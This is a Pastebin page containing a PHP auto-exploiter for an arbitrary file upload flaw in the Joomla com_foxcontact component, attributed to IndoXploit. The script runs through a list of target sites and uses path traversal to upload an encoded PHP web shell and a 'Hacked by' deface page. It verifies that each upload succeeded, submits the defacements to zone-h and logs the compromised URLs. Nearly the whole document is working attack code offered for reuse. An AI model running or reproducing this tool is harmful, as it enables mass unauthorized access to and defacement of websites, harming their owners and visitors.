API tools faq
paste
Advertisement
AgusSR

Joomla Component com_foxcontact Arbitrary File Upload (BOT)

AgusSR
Dec 11th, 2017
3,876
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.91 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3.  
  4. Joomla Component com_foxcontact Arbitrary File Upload
  5. https://cxsecurity.com/issue/WLB-2016050072
  6.  
  7. Auto Exploiter (Shell Upload, Auto Deface, and Auto Submit Zone -H)
  8. Coded by: L0c4lh34rtz - IndoXploit
  9. http://www.indoxploit.or.id/2017/12/joomla-component-comfoxcontact.html
  10.  
  11. */
  12.  
  13. error_reporting(0);
  14. set_time_limit(0);
  15.  
  16. Class IDX_Foxcontact {
  17.     public  $url;
  18.     private $file = [];
  19.  
  20.     /* Nick Hacker Kalian / Nick Zone -H Kalian */
  21.     /* Pastikan dalam script deface kalian terdapat kata HACKED */
  22.     private $hacker = "L0c4lh34rtz";
  23.  
  24.     /* script uploader, sebaiknya jangan di otak-atik */
  25.     private $uploader  = 'R0lGODlhOw0KPGh0bWw+DQo8dGl0bGU+VXBsb2FkZXIgQnkgSW5kb1hwbG9pdCBCT1Q8L3RpdGxlPg0KPHA+PD9waHAgZWNobyAnPGI+Jy5waHBfdW5hbWUoKS4nPC9iPic7ID8+PGJyPg0KPD9waHAgZWNobyAnPGI+Jy5nZXRjd2QoKS4nPC9iPic7ID8+PC9wPg0KPGZvcm0gbWV0aG9kPSdwb3N0JyBlbmN0eXBlPSdtdWx0aXBhcnQvZm9ybS1kYXRhJz4NCjxpbnB1dCB0eXBlPSdmaWxlJyBuYW1lPSdpZHhfZmlsZSc+DQo8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXBsb2FkJyBuYW1lPSd1cGxvYWQnPg0KPC9mb3JtPg0KPD9waHAgaWYoaXNzZXQoJF9QT1NUWyd1cGxvYWQnXSkpIHsgaWYoQGNvcHkoJF9GSUxFU1snaWR4X2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snaWR4X2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvJF9GSUxFU1snaWR4X2ZpbGUnXVsnbmFtZSddLiAnWzxiPk9LPC9iPl0nOyB9IGVsc2UgeyBlY2hvJF9GSUxFU1snaWR4X2ZpbGUnXVsnbmFtZSddLiAnWzxiPkZBSUxFRDwvYj4nOyB9IH0gPz4=';
  26.        
  27.     /* script deface, ubah bagian ini ke base64 script deface kalian */
  28.     private $deface    = 'DQo8IS0tDQphZG1pbkBpbmRveHBsb2l0Lm9yLmlkDQoNCiNQYXRjaCBZb3VyIFN5c3RlbQ0KLS0+DQo8IURPQ1RZUEUgSFRNTD4NCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+SGFja2VkIGJ5IEwwYzRsaDM0cnR6fjwvdGl0bGU+DQo8bWV0YSBjaGFyc2V0PSJVVEYtOCI+DQo8bWV0YSBuYW1lPSJhdXRob3IiIGNvbnRlbnQ9IkwwYzRsaDM0cnR6ICNJbmRvWHBsb2l0ICNTYW5qdW5nYW5KaXdhIj4NCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJJbmRvWHBsb2l0LCBTYW5qdW5nYW4gSml3YSwgSGFja2VkIGJ5IEluZG9YcGxvaXQsIEhhY2tlZCBieSBMMGM0bGgzNHJ0eiI+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6a2V5d29yZHMiIGNvbnRlbnQ9IkluZG9YcGxvaXQsIFNhbmp1bmdhbiBKaXdhLCBIYWNrZWQgYnkgSW5kb1hwbG9pdCwgSGFja2VkIGJ5IEwwYzRsaDM0cnR6Ij4NCjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJIYWNrZWQgYnkgTDBjNGxoMzRydHogfCBJbmRvWHBsb2l0IC0gU2FuanVuZ2FuIEppd2EiPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiBjb250ZW50PSJIYWNrZWQgYnkgTDBjNGxoMzRydHogfCBJbmRvWHBsb2l0IC0gU2FuanVuZ2FuIEppd2EiPg0KPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vZmxhLmZnLWEuY29tL2ZsYWdzL2luZG9uZXNpYS1mbGFnLWJ1dHRvbi0yLnBuZyI+DQo8c3R5bGU+DQpoMSB7DQoJbWFyZ2luLXRvcDogNGVtOw0KCWZvbnQtZmFtaWx5OiBtb25vc3BhY2U7DQoJZm9udC1zaXplOiA0NXB4Ow0KfQ0KDQpib2R5IHsgDQoJYmFja2dyb3VuZDogYmxhY2s7IA0KCXRleHQtYWxpZ246IGNlbnRlcjsgDQoJdGV4dC1zaGFkb3c6IDFweCAxcHggIzE3YTI0ZjsgDQoJZm9udC1mYW1pbHk6Q291cmllciBOZXc7IA0KCWNvbG9yOiB3aGl0ZTsgDQp9IA0KPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KPGgxPkhhY2tlZCBieSBMMGM0bGgzNHJ0ejwvaDE+DQo8cD48Zm9udCBzaXplPSIyIj4jPG1hcnF1ZWUgYmVoYXZpb3I9ImFsdGVybmF0ZSIgc2Nyb2xsYW1vdW50PSI0IiB3aWR0aD0iNDAlIj5JbmRvWHBsb2l0IC0gU2FuanVuZ2FuIEppd2EgLSBEZXBvayBDeWJlciBTZWN1cml0eSA8L21hcnF1ZWU+IzwvZm9udD48L3A+DQo8aWZyYW1lIHNyYz0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS9lbWJlZC9Fem14N21VNnF0Zz9yZWw9MCZhbXA7YXV0b3BsYXk9MSZhbXA7bG9vcD0xJmFtcDtwbGF5bGlzdD1Fem14N21VNnF0ZyIgZnJhbWVib3JkZXI9IjAiIGhlaWdodD0iMSIgd2lkdGg9IjEiPjwvaWZyYW1lPg0KPC9ib2R5Pg0KPC9odG1sPg0KPG5vc2NyaXB0Pg0KPCEtLQ==';
  29.  
  30.          
  31.  
  32.     public function __construct() {
  33.         $this->file = (object) $this->file;
  34.  
  35.         /* Nama file deface kalian */
  36.         $this->file->deface     = "l0c.htm";
  37.  
  38.         $this->file->shell      = $this->randomFileName().".php";
  39.     }
  40.  
  41.     public function validUrl() {
  42.         if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
  43.             $url = "http://".$this->url;
  44.             return $url;
  45.         } else {
  46.             return $this->url;
  47.         }
  48.     }
  49.  
  50.     public function randomFileName() {
  51.         $characters = implode("", range(0,9)).implode("", range("A","Z")).implode("", range("a","z"));
  52.         $generate   = substr(str_shuffle($characters), 0, rand(4, 8));
  53.  
  54.         $prefixFilename = "\x69\x6e\x64\x6f\x78\x70\x6c\x6f\x69\x74"."_";
  55.         return $prefixFilename.$generate;
  56.     }
  57.  
  58.     public function curl($url, $data = null, $headers = null, $cookie = true) {
  59.         $ch = curl_init();
  60.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  61.               curl_setopt($ch, CURLOPT_URL, $url);
  62.               curl_setopt($ch, CURLOPT_USERAGENT, "IndoXploitTools/1.1");
  63.               //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
  64.               curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  65.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  66.               curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  67.               curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  68.  
  69.         if($data !== null) {
  70.               curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
  71.               curl_setopt($ch, CURLOPT_POST, TRUE);
  72.               curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  73.         }
  74.  
  75.         if($headers !== null) {
  76.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  77.         }
  78.  
  79.         if($cookie === true) {
  80.               curl_setopt($ch, CURLOPT_COOKIE, TRUE);
  81.               curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
  82.               curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
  83.         }
  84.  
  85.         $exec = curl_exec($ch);
  86.         $info = curl_getinfo($ch);
  87.  
  88.               curl_close($ch);
  89.  
  90.         return (object) [
  91.             "response"  => $exec,
  92.             "info"      => $info
  93.         ];
  94.  
  95.     }
  96.  
  97.     public function getId() {
  98.         $url        = $this->url;
  99.         $getContent = $this->curl($url)->response;
  100.         preg_match_all("/<a name=\"cid_(.*?)\">/", $getContent, $cid);
  101.         preg_match_all("/<a name=\"mid_(.*?)\">/", $getContent, $mid);
  102.  
  103.         return (object) [
  104.             "cid" => ($cid[1][0] === NULL ? 0 : $cid[1][0]),
  105.             "mid" => ($mid[1][0] === NULL ? 0 : $mid[1][0]),
  106.         ];
  107.     }
  108.  
  109.     public function exploit() {
  110.         $getCid = $this->getId()->cid;
  111.         $getMid = $this->getId()->mid;
  112.  
  113.         $url    = (object) parse_url($this->url);
  114.  
  115.         $headers = [
  116.             "X-Requested-With: XMLHttpRequest",
  117.             "X-File-Name: ".$this->file->shell,
  118.             "Content-Type: image/jpeg"
  119.         ];
  120.  
  121.         $vuln   = [
  122.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/file-uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  123.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  124.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  125.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  126.         ];
  127.  
  128.         foreach($vuln as $v) {
  129.             $this->curl($v, base64_decode($this->uploader), $headers);
  130.         }
  131.  
  132.         $shell = $url->scheme."://".$url->host."/components/com_foxcontact/".$this->file->shell;
  133.         $check = $this->curl($shell)->response;
  134.         if(preg_match("/Uploader By IndoXploit BOT/i", $check)) {
  135.             print "[+] Shell OK: ".$shell."\n";
  136.             $this->save($shell);
  137.         } else {
  138.             print "[-] Shell Failed\n";
  139.         }
  140.        
  141.         $vuln   = [
  142.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/file-uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  143.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  144.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  145.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  146.         ];
  147.  
  148.         foreach($vuln as $v) {
  149.             $this->curl($v, base64_decode($this->deface), $headers);
  150.         }
  151.  
  152.         $deface = $url->scheme."://".$url->host."/".$this->file->deface;
  153.         $check = $this->curl($deface)->response;
  154.         if(preg_match("/hacked/i", $check)) {
  155.             print "[+] Deface OK: ".$deface."\n";
  156.             $this->zoneh($deface);
  157.             $this->save($deface);
  158.         } else {
  159.             print "[-] Deface Failed\n";
  160.         }
  161.     }
  162.  
  163.     public function zoneh($url) {
  164.         $post = $this->curl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
  165.         if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $post->response, $matches)) {
  166.             if($matches[1] === "ERROR") {
  167.                 preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $post->response, $matches2);
  168.                 print "[-] Zone-H ($url) [ERROR: ".$matches2[1]."]\n\n";
  169.             } else {
  170.                 print "[+] Zone-H ($url) [OK]\n\n";
  171.             }
  172.         }
  173.     }
  174.  
  175.     public function save($isi) {
  176.         $handle = fopen("result_foxcontact.txt", "a+");
  177.         fwrite($handle, "$isi\n");
  178.         fclose($handle);
  179.     }
  180. }  
  181.  
  182. if(!isset($argv[1])) die("!! Usage: php ".$argv[0]." target.txt");
  183. if(!file_exists($argv[1])) die("!! File target ".$argv[1]." tidak di temukan!!");
  184. $open = explode("\n", file_get_contents($argv[1]));
  185.  
  186. foreach($open as $list) {
  187.     $fox = new IDX_Foxcontact();
  188.     $fox->url = trim($list);
  189.     $fox->url = $fox->validUrl();
  190.  
  191.     print "[*] Exploiting ".parse_url($fox->url, PHP_URL_HOST)."\n";
  192.     $fox->exploit();
  193. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!